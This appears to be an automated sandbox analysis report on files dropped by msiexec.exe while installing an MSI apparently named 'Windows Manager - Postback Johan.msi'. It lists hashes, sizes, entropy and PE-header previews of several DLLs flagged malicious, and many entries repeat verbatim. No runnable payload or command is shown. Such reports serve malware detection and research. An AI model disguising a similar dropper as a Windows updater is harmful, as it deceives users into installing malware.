                                                                                                                                                                                                                                                                        Preview:......................>...................<...................................T.......|.......C...D...E...F...G...H...I...J...K...L...M...N...O...P...v...w...x.......................6...7...8...9...:...;...<...=...W...X...Y...Z...[...\...]...^..._...`...C...D...E...F...G...H...I...J...K...L...M...N...........i...................................................................................................................................................................................................................n...............)...?........................................................................................... ...!..."...#...$...%...&...'...(...6...*...<...,...-......./...0...1...2...3...4...5.......7...8...9...:...;...@...=...>...H...K...A...B...C...D...E...F...G...S...I...J...V...L...M...N...O...P...Q...R.......{.......V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):536592
                                                                                                                                                                                                                                                                        Entropy (8bit):6.427124970627738
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:s32hV/GguOWuGAtLppJZZ5QNIwqKljoMA3KzAOXalOHZRrQinqR/S:m2hV/BGgpV3QWyjwmklOHZ3nq5S
                                                                                                                                                                                                                                                                        MD5:6EA65025106536EB75F026E46643B099
                                                                                                                                                                                                                                                                        SHA1:D6F5801E370C92D8E5C2336B4022CC6CB6EC1F99
                                                                                                                                                                                                                                                                        SHA-256:DAE76CCE74D63E7935FDE4383020659D75B68632F8A01F2053EC895E69BB4EFB
                                                                                                                                                                                                                                                                        SHA-512:062AED4C7541346B7338E1D234A50AA9AF76F103A65268BA65A42508A26C10CC27CCFCE6131485403AFA36D8A8CD69F3BF1E55CD1A1F675357B87228AACBB988
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R...<...<...<...?...<...9.u.<...8...<...?...<...9...<...8...<...:...<...=...<...=.m.<.^.5...<.^.<...<.^....<.....<.^.>...<.Rich..<.........PE..L...Z.gb.........."!.........................................................P............@.........................P...(...x...,...............................0Z......p...............................@...............(............................text............................... ..`.rdata..............................@..@.data...t"..........................@....rsrc...............................@..@.reloc..0Z.......\..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):536592
                                                                                                                                                                                                                                                                        Entropy (8bit):6.427124970627738
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:s32hV/GguOWuGAtLppJZZ5QNIwqKljoMA3KzAOXalOHZRrQinqR/S:m2hV/BGgpV3QWyjwmklOHZ3nq5S
                                                                                                                                                                                                                                                                        MD5:6EA65025106536EB75F026E46643B099
                                                                                                                                                                                                                                                                        SHA1:D6F5801E370C92D8E5C2336B4022CC6CB6EC1F99
                                                                                                                                                                                                                                                                        SHA-256:DAE76CCE74D63E7935FDE4383020659D75B68632F8A01F2053EC895E69BB4EFB
                                                                                                                                                                                                                                                                        SHA-512:062AED4C7541346B7338E1D234A50AA9AF76F103A65268BA65A42508A26C10CC27CCFCE6131485403AFA36D8A8CD69F3BF1E55CD1A1F675357B87228AACBB988
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R...<...<...<...?...<...9.u.<...8...<...?...<...9...<...8...<...:...<...=...<...=.m.<.^.5...<.^.<...<.^....<.....<.^.>...<.Rich..<.........PE..L...Z.gb.........."!.........................................................P............@.........................P...(...x...,...............................0Z......p...............................@...............(............................text............................... ..`.rdata..............................@..@.data...t"..........................@....rsrc...............................@..@.reloc..0Z.......\..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):536592
                                                                                                                                                                                                                                                                        Entropy (8bit):6.427124970627738
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:s32hV/GguOWuGAtLppJZZ5QNIwqKljoMA3KzAOXalOHZRrQinqR/S:m2hV/BGgpV3QWyjwmklOHZ3nq5S
                                                                                                                                                                                                                                                                        MD5:6EA65025106536EB75F026E46643B099
                                                                                                                                                                                                                                                                        SHA1:D6F5801E370C92D8E5C2336B4022CC6CB6EC1F99
                                                                                                                                                                                                                                                                        SHA-256:DAE76CCE74D63E7935FDE4383020659D75B68632F8A01F2053EC895E69BB4EFB
                                                                                                                                                                                                                                                                        SHA-512:062AED4C7541346B7338E1D234A50AA9AF76F103A65268BA65A42508A26C10CC27CCFCE6131485403AFA36D8A8CD69F3BF1E55CD1A1F675357B87228AACBB988
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R...<...<...<...?...<...9.u.<...8...<...?...<...9...<...8...<...:...<...=...<...=.m.<.^.5...<.^.<...<.^....<.....<.^.>...<.Rich..<.........PE..L...Z.gb.........."!.........................................................P............@.........................P...(...x...,...............................0Z......p...............................@...............(............................text............................... ..`.rdata..............................@..@.data...t"..........................@....rsrc...............................@..@.reloc..0Z.......\..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):536592
                                                                                                                                                                                                                                                                        Entropy (8bit):6.427124970627738
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:s32hV/GguOWuGAtLppJZZ5QNIwqKljoMA3KzAOXalOHZRrQinqR/S:m2hV/BGgpV3QWyjwmklOHZ3nq5S
                                                                                                                                                                                                                                                                        MD5:6EA65025106536EB75F026E46643B099
                                                                                                                                                                                                                                                                        SHA1:D6F5801E370C92D8E5C2336B4022CC6CB6EC1F99
                                                                                                                                                                                                                                                                        SHA-256:DAE76CCE74D63E7935FDE4383020659D75B68632F8A01F2053EC895E69BB4EFB
                                                                                                                                                                                                                                                                        SHA-512:062AED4C7541346B7338E1D234A50AA9AF76F103A65268BA65A42508A26C10CC27CCFCE6131485403AFA36D8A8CD69F3BF1E55CD1A1F675357B87228AACBB988
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R...<...<...<...?...<...9.u.<...8...<...?...<...9...<...8...<...:...<...=...<...=.m.<.^.5...<.^.<...<.^....<.....<.^.>...<.Rich..<.........PE..L...Z.gb.........."!.........................................................P............@.........................P...(...x...,...............................0Z......p...............................@...............(............................text............................... ..`.rdata..............................@..@.data...t"..........................@....rsrc...............................@..@.reloc..0Z.......\..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):808464
                                                                                                                                                                                                                                                                        Entropy (8bit):6.399509710294407
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:LPO8KYTJAJ5NqLaphV6mzFf3zLha2xqe4k+pqm8esHxYs265R3PPn70+8xM9:LG/pPhPzLM28e4UtHh5R3PPn70+8xM9
                                                                                                                                                                                                                                                                        MD5:DD1F93EB81E6C99BA9BE55B0C12E8BB4
                                                                                                                                                                                                                                                                        SHA1:1D767983AAA4EB5C9E19409CF529969142033850
                                                                                                                                                                                                                                                                        SHA-256:F55B853958F07B15F0DAE7A871C1EBE2EC117EF54BA3811D31CEC4C8AE471D9B
                                                                                                                                                                                                                                                                        SHA-512:7968839CA3E7337B2E7774D92C4A3666E9B7D8D76000475B39C2BDA6DB3320FC9B2100322505997798AF5631A007787FBD8D0D6FE0B51949C545C67E696AAF1A
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......bu.2&..a&..a&..a.f.`+..a.f.`...aDl.`7..aDl.`>..aDl.`u..a.f.`>..a.f.`'..a.f.`;..a&..a...a.m.`h..a.m.`'..a.m(a'..a&.@a$..a.m.`'..aRich&..a........................PE..L.....gb.........."!.........R......................................................4/....@......................... ................................8..........p...H...p...............................@............................................text...x........................... ..`.rdata..0...........................@..@.data...@...........................@....rsrc................B..............@..@.reloc..p............Z..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):935952
                                                                                                                                                                                                                                                                        Entropy (8bit):6.465848738967934
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24576:w327CUJc4RQ8Btk8Y5EiwB4aNXVW+hv+AhiC:cAc4RQ8BtDAoB4aNXVW+hv+AhiC
                                                                                                                                                                                                                                                                        MD5:91D4A8C2C296EF53DD8C01B9AF69B735
                                                                                                                                                                                                                                                                        SHA1:AD2E5311A0F2DBBA988FBDB6FCF70034FDA3920D
                                                                                                                                                                                                                                                                        SHA-256:A787E7A1AD12783FCBF3F853940590329E0FF0DDDF17282324F2D95ED6408F23
                                                                                                                                                                                                                                                                        SHA-512:63C5506A55DEA2B3BD1C99B79B5668F5AFC0104564E92F07AFB42F2F2B67EAE9D0E0174CB36E6095A27A6C71496206042079B6E5A2B2FF787F3CB9EF20995E9E
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:b..[...[...[..7)...[..7)..Q[..#...[..#...[..#..[..7)...[..7)...[...[...Z..d"...[..d"...[..d"...[...[...[..d"...[..Rich.[..........PE..L...!.gb.........."!................ ........................................p......,.....@.........................0|..t....|.......`...............*.......p.......,..p...................@-.......+..@............................................text...N........................... ..`.rdata..T...........................@..@.data...T............x..............@....rsrc........`.......,..............@..@.reloc.......p.......2..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):808464
                                                                                                                                                                                                                                                                        Entropy (8bit):6.399509710294407
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:LPO8KYTJAJ5NqLaphV6mzFf3zLha2xqe4k+pqm8esHxYs265R3PPn70+8xM9:LG/pPhPzLM28e4UtHh5R3PPn70+8xM9
                                                                                                                                                                                                                                                                        MD5:DD1F93EB81E6C99BA9BE55B0C12E8BB4
                                                                                                                                                                                                                                                                        SHA1:1D767983AAA4EB5C9E19409CF529969142033850
                                                                                                                                                                                                                                                                        SHA-256:F55B853958F07B15F0DAE7A871C1EBE2EC117EF54BA3811D31CEC4C8AE471D9B
                                                                                                                                                                                                                                                                        SHA-512:7968839CA3E7337B2E7774D92C4A3666E9B7D8D76000475B39C2BDA6DB3320FC9B2100322505997798AF5631A007787FBD8D0D6FE0B51949C545C67E696AAF1A
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......bu.2&..a&..a&..a.f.`+..a.f.`...aDl.`7..aDl.`>..aDl.`u..a.f.`>..a.f.`'..a.f.`;..a&..a...a.m.`h..a.m.`'..a.m(a'..a&.@a$..a.m.`'..aRich&..a........................PE..L.....gb.........."!.........R......................................................4/....@......................... ................................8..........p...H...p...............................@............................................text...x........................... ..`.rdata..0...........................@..@.data...@...........................@....rsrc................B..............@..@.reloc..p............Z..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):536592
                                                                                                                                                                                                                                                                        Entropy (8bit):6.427124970627738
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:s32hV/GguOWuGAtLppJZZ5QNIwqKljoMA3KzAOXalOHZRrQinqR/S:m2hV/BGgpV3QWyjwmklOHZ3nq5S
                                                                                                                                                                                                                                                                        MD5:6EA65025106536EB75F026E46643B099
                                                                                                                                                                                                                                                                        SHA1:D6F5801E370C92D8E5C2336B4022CC6CB6EC1F99
                                                                                                                                                                                                                                                                        SHA-256:DAE76CCE74D63E7935FDE4383020659D75B68632F8A01F2053EC895E69BB4EFB
                                                                                                                                                                                                                                                                        SHA-512:062AED4C7541346B7338E1D234A50AA9AF76F103A65268BA65A42508A26C10CC27CCFCE6131485403AFA36D8A8CD69F3BF1E55CD1A1F675357B87228AACBB988
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R...<...<...<...?...<...9.u.<...8...<...?...<...9...<...8...<...:...<...=...<...=.m.<.^.5...<.^.<...<.^....<.....<.^.>...<.Rich..<.........PE..L...Z.gb.........."!.........................................................P............@.........................P...(...x...,...............................0Z......p...............................@...............(............................text............................... ..`.rdata..............................@..@.data...t"..........................@....rsrc...............................@..@.reloc..0Z.......\..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):619024
                                                                                                                                                                                                                                                                        Entropy (8bit):6.436769279281569
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:SPN4ezd+X2P+nDxK5AW8WDExKYoWNico9pj6QZC8d9ZP9Zb:SP8VKWfKEjoW8p3jtZC8d9ZP9Zb
                                                                                                                                                                                                                                                                        MD5:0D093A6DB075DB4D3AF06337A6CFC3F3
                                                                                                                                                                                                                                                                        SHA1:7A27265809C47F96F29A09A960BADD4C83BDB167
                                                                                                                                                                                                                                                                        SHA-256:F4C42C1393B907430C89BC504B24A589438690496A38BF7B75358ADBDB48F6B3
                                                                                                                                                                                                                                                                        SHA-512:1D857EBFCF2526DD142AB72320073AE582DCF26C2D2A0D4C67267BD038182145572CA9C015F06A895555B90D8558DACFA4DF6D7A105F6072D356A71532AC87F9
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9.+^Xsx^Xsx^Xsx.*pySXsx.*vy.Xsx< wyOXsx< pyFXsx.*wyGXsx< vy.Xsx.*uy_Xsx.*ryIXsx^Xrx.Ysx.!zy.Xsx.!sy_Xsx.!.x_Xsx^X.x_Xsx.!qy_XsxRich^Xsx........PE..L.....gb.........."!................l.....................................................@......................... .......<........0..h............T.......@...^......p...................@...........@.......................@....................text...&........................... ..`.rdata...!......."..................@..@.data...0"..........................@....rsrc...h....0......................@..@.reloc...^...@...`..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):808464
                                                                                                                                                                                                                                                                        Entropy (8bit):6.399509710294407
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:LPO8KYTJAJ5NqLaphV6mzFf3zLha2xqe4k+pqm8esHxYs265R3PPn70+8xM9:LG/pPhPzLM28e4UtHh5R3PPn70+8xM9
                                                                                                                                                                                                                                                                        MD5:DD1F93EB81E6C99BA9BE55B0C12E8BB4
                                                                                                                                                                                                                                                                        SHA1:1D767983AAA4EB5C9E19409CF529969142033850
                                                                                                                                                                                                                                                                        SHA-256:F55B853958F07B15F0DAE7A871C1EBE2EC117EF54BA3811D31CEC4C8AE471D9B
                                                                                                                                                                                                                                                                        SHA-512:7968839CA3E7337B2E7774D92C4A3666E9B7D8D76000475B39C2BDA6DB3320FC9B2100322505997798AF5631A007787FBD8D0D6FE0B51949C545C67E696AAF1A
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......bu.2&..a&..a&..a.f.`+..a.f.`...aDl.`7..aDl.`>..aDl.`u..a.f.`>..a.f.`'..a.f.`;..a&..a...a.m.`h..a.m.`'..a.m(a'..a&.@a$..a.m.`'..aRich&..a........................PE..L.....gb.........."!.........R......................................................4/....@......................... ................................8..........p...H...p...............................@............................................text...x........................... ..`.rdata..0...........................@..@.data...@...........................@....rsrc................B..............@..@.reloc..p............Z..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):808464
                                                                                                                                                                                                                                                                        Entropy (8bit):6.399509710294407
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:LPO8KYTJAJ5NqLaphV6mzFf3zLha2xqe4k+pqm8esHxYs265R3PPn70+8xM9:LG/pPhPzLM28e4UtHh5R3PPn70+8xM9
                                                                                                                                                                                                                                                                        MD5:DD1F93EB81E6C99BA9BE55B0C12E8BB4
                                                                                                                                                                                                                                                                        SHA1:1D767983AAA4EB5C9E19409CF529969142033850
                                                                                                                                                                                                                                                                        SHA-256:F55B853958F07B15F0DAE7A871C1EBE2EC117EF54BA3811D31CEC4C8AE471D9B
                                                                                                                                                                                                                                                                        SHA-512:7968839CA3E7337B2E7774D92C4A3666E9B7D8D76000475B39C2BDA6DB3320FC9B2100322505997798AF5631A007787FBD8D0D6FE0B51949C545C67E696AAF1A
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......bu.2&..a&..a&..a.f.`+..a.f.`...aDl.`7..aDl.`>..aDl.`u..a.f.`>..a.f.`'..a.f.`;..a&..a...a.m.`h..a.m.`'..a.m(a'..a&.@a$..a.m.`'..aRich&..a........................PE..L.....gb.........."!.........R......................................................4/....@......................... ................................8..........p...H...p...............................@............................................text...x........................... ..`.rdata..0...........................@..@.data...@...........................@....rsrc................B..............@..@.reloc..p............Z..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):452495
                                                                                                                                                                                                                                                                        Entropy (8bit):6.585602697706931
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:F+FQ38t/SZfkVfISkC7R7Z1urie+FQ38t/SZfkVfISkC7R7Z1uriFx/VE:FP8t/kM9XR7Z2ieP8t/kM9XR7Z2i39E
                                                                                                                                                                                                                                                                        MD5:F8A5DE3A0D25EDC68A74C5DA9D432622
                                                                                                                                                                                                                                                                        SHA1:79A39341FFC6EA648DDE8CF1EB387D4D5CED62C3
                                                                                                                                                                                                                                                                        SHA-256:966316FA26260E1FB38DB814249B3688037B62E732C3AED9AC55B62252993801
                                                                                                                                                                                                                                                                        SHA-512:877655CD08596D2042A66926762891CF568FC927F8D2299F7040427202ED85531ADFE24DA75B498CB3CC3C0EB015484DCF19FEEB508D72E2029AB38374A4B682
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@4t.W.@.....@.....@.....@.....@.....@......&.{C845414C-903C-4218-9DE7-132AB97FDF62}..Windows Manager$.Windows Manager - Postback Johan.msi.@.....@.....@.....@......logo.exe..&.{C5EBDD8B-C384-4CB5-9A33-9A4EF2189D51}.....@.....@.....@.....@.......@.....@.....@.......@......Windows Manager......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{28FDA578-EFA5-4A4F-A558-E4219B09577D}2.C:\Program Files (x86)\AW Manager\Windows Manager\.@.......@.....@.....@......&.{D30ED18A-DEA4-45D6-8A1F-1643C3CC79C1}/.02:\Software\AW Manager\Windows Manager\Version.@.......@.....@.....@......&.{C48C1022-6EC4-4C0F-BB98-0EA64D330920}E.C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe.@.......@.....@.....@......&.{FD7030D8-9E76-4445-B52A-726084B486D7}/.02:\Software\AW Manager\Windows Manager\Success.@.......@.....@.....@......&.{BDF67205-71EF-48E8-B3
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):194064
                                                                                                                                                                                                                                                                        Entropy (8bit):6.416801574526807
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:pj+sQSJ38YR4h04SZto/ycbzhfIZk7yukfxYJyAfqgT7Z14hZliQiPD4:J+FQ38t/SZfkVfISkC7R7Z1uri0
                                                                                                                                                                                                                                                                        MD5:B0DDA68E058A4CAA8B88AA2A47961D2A
                                                                                                                                                                                                                                                                        SHA1:76AF9DE0D7512B9581A787648C2F8997EC1347DD
                                                                                                                                                                                                                                                                        SHA-256:05640FEC802CC4F0F0865671473E54187CA3FC495B17D62E6D89B0019DDA9291
                                                                                                                                                                                                                                                                        SHA-512:DA9F0EE169DEB615B1B771963F4FE0039E20E45D45A8AE6FAEEF22C9B8E5833F8F1EB67A4D3C4B0DD7DBB134DA6230142ADA3579D81A4020D4E4FB05EE9A5731
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........z...)...)...),.(...),.(o..)..(.)..(.),.(.)..(..),.(...),.(.)...)...)..(.)..(...)..g)...)...)...)..(...)Rich...)........PE..L...].gb.........."!......................... ......................................i.....@.........................@..........x.......x............................y..p...................@z.......$..@............ ......L...@....................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...x...........................@..@.reloc........... ..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):194064
                                                                                                                                                                                                                                                                        Entropy (8bit):6.416801574526807
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:pj+sQSJ38YR4h04SZto/ycbzhfIZk7yukfxYJyAfqgT7Z14hZliQiPD4:J+FQ38t/SZfkVfISkC7R7Z1uri0
                                                                                                                                                                                                                                                                        MD5:B0DDA68E058A4CAA8B88AA2A47961D2A
                                                                                                                                                                                                                                                                        SHA1:76AF9DE0D7512B9581A787648C2F8997EC1347DD
                                                                                                                                                                                                                                                                        SHA-256:05640FEC802CC4F0F0865671473E54187CA3FC495B17D62E6D89B0019DDA9291
                                                                                                                                                                                                                                                                        SHA-512:DA9F0EE169DEB615B1B771963F4FE0039E20E45D45A8AE6FAEEF22C9B8E5833F8F1EB67A4D3C4B0DD7DBB134DA6230142ADA3579D81A4020D4E4FB05EE9A5731
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........z...)...)...),.(...),.(o..)..(.)..(.),.(.)..(..),.(...),.(.)...)...)..(.)..(...)..g)...)...)...)..(...)Rich...)........PE..L...].gb.........."!......................... ......................................i.....@.........................@..........x.......x............................y..p...................@z.......$..@............ ......L...@....................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...x...........................@..@.reloc........... ..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):368656
                                                                                                                                                                                                                                                                        Entropy (8bit):6.527849690840632
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:VVV5O05nCzZ/ttMcvhselqDoNZaN8/71AOJls1RM4x:VVV5OyqZ1tMuocrbzQi4x
                                                                                                                                                                                                                                                                        MD5:C9116717F0148BC318B94B65B3F24F44
                                                                                                                                                                                                                                                                        SHA1:306475EF112A7F61133B3C7CD1FDAB9DB4246EF9
                                                                                                                                                                                                                                                                        SHA-256:5C47B2F70AFDAAB478A9DE7768E0D78C1AEC1838036E7130F4182A24BCA2DD2C
                                                                                                                                                                                                                                                                        SHA-512:C73DC6284E237784D5B9F89EFD242532B8B23A0CE412743BFA3D19473B4F985EF866D45B4F0743BDFD655708484F14D01FA2E6B0057745DF0D5AC13C960B86B3
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........HK..&...&...&...%...&...#.l.&..."...&...%...&...#...&..."...&...'...&...'...&.B./...&.B.&...&.B.....&......&.B.$...&.Rich..&.........PE..L...}.gb.........."!...............................................................K.....@.........................p-..X....-.......`...........................3..(...p...........................h...@............................................text...x........................... ..`.rdata..&M.......N..................@..@.data........@.......$..............@....rsrc........`.......6..............@..@.reloc...3.......4...N..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
